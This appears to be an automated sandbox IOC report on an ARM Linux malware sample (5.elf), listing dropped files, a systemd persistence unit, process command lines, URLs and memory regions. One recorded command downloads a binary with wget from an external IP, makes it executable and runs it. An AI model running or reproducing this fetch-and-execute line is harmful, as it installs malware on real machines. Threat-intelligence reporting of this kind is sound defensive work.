IOC Report
5.elf

loading gif

Files

File Path
Type
Category
Malicious
5.elf
ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
initial sample
malicious
/tmp/5
ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
dropped
malicious
/etc/systemd/system/hello.service
ASCII text
dropped
/memfd:snapd-env-generator (deleted)
ASCII text
dropped

Processes

Path
Cmdline
Malicious
/tmp/5.elf
/tmp/5.elf
/tmp/5.elf
-
/bin/sh
sh -c "systemctl daemon-reload > /dev/null 2>&1"
/bin/sh
-
/usr/bin/systemctl
systemctl daemon-reload
/tmp/5.elf
-
/bin/sh
sh -c "systemctl start hello.service > /dev/null 2>&1"
/bin/sh
-
/usr/bin/systemctl
systemctl start hello.service
/usr/bin/xfce4-panel
-
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
/usr/bin/xfce4-panel
-
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
/usr/bin/xfce4-panel
-
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
/usr/bin/xfce4-panel
-
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
/usr/bin/xfce4-panel
-
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
/usr/bin/xfce4-panel
-
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
/usr/lib/systemd/systemd
-
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/lib/systemd/systemd
-
/bin/bash
/bin/bash -c "sleep 10; rm -rf /tmp/5; wget http://103.136.41.100/5 -O /tmp/5; chmod 777 /tmp/5; /tmp/5 .p1 > /dev/null 2>&1;"
/bin/bash
-
/usr/bin/sleep
sleep 10
/bin/bash
-
/usr/bin/rm
rm -rf /tmp/5
/bin/bash
-
/usr/bin/wget
wget http://103.136.41.100/5 -O /tmp/5
/bin/bash
-
/usr/bin/chmod
chmod 777 /tmp/5
/bin/bash
-
/tmp/5
/tmp/5 .p1
There are 25 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://%d.%d.%d.%d/%s
unknown
http://1/wget.sh
unknown
http://103.136.41.100/5
103.136.41.100
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://9/curl.sh
unknown
http://%d.%d.%d.%d/2;
unknown
http://schemas.xmlsoap.org/soap/envelope/
unknown

Domains

Name
IP
Malicious
daisy.ubuntu.com
162.213.35.25

IPs

IP
Domain
Country
Malicious
103.136.41.100
unknown
India

Memdumps

Base Address
Regiontype
Protect
Malicious
7f3acc749000
page read and write
7ffee2923000
page execute read
55d3985cc000
page execute and read and write
7fa655e9f000
page read and write
7f39c402d000
page execute read
5579a1208000
page read and write
7ffc8cdd7000
page read and write
5579a320f000
page execute and read and write
7fa655fec000
page read and write
7fa6556e2000
page read and write
7f3acbeaf000
page read and write
5579a1211000
page read and write
7f3acd087000
page read and write
55d3965ce000
page read and write
5579a0fb7000
page execute read
7fa55003a000
page read and write
7f3acc6b7000
page read and write
55d3965c5000
page read and write
7fa550036000
page read and write
7f3acd268000
page read and write
7fa6552ee000
page read and write
7fa64ffff000
page read and write
5579a3226000
page read and write
7fa655cbe000
page read and write
7f3accd16000
page read and write
7f3accea5000
page read and write
7f39c4036000
page read and write
7fa655380000
page read and write
7f3accd39000
page read and write
7f3ac4021000
page read and write
7f3ac3fff000
page read and write
7fa654ae6000
page read and write
7f3accaab000
page read and write
7fa55002d000
page execute read
55d3985e3000
page read and write
7fa655970000
page read and write
7fa656031000
page read and write
7ffee2860000
page read and write
5579a3e40000
page read and write
7fa65594d000
page read and write
55d396374000
page execute read
7f3acd3fa000
page read and write
7fa650021000
page read and write
7fa655adc000
page read and write
7ffc8cddb000
page execute read
7f3acd391000
page read and write
7f39c403a000
page read and write
7fa655fc8000
page read and write
7f3acd3b5000
page read and write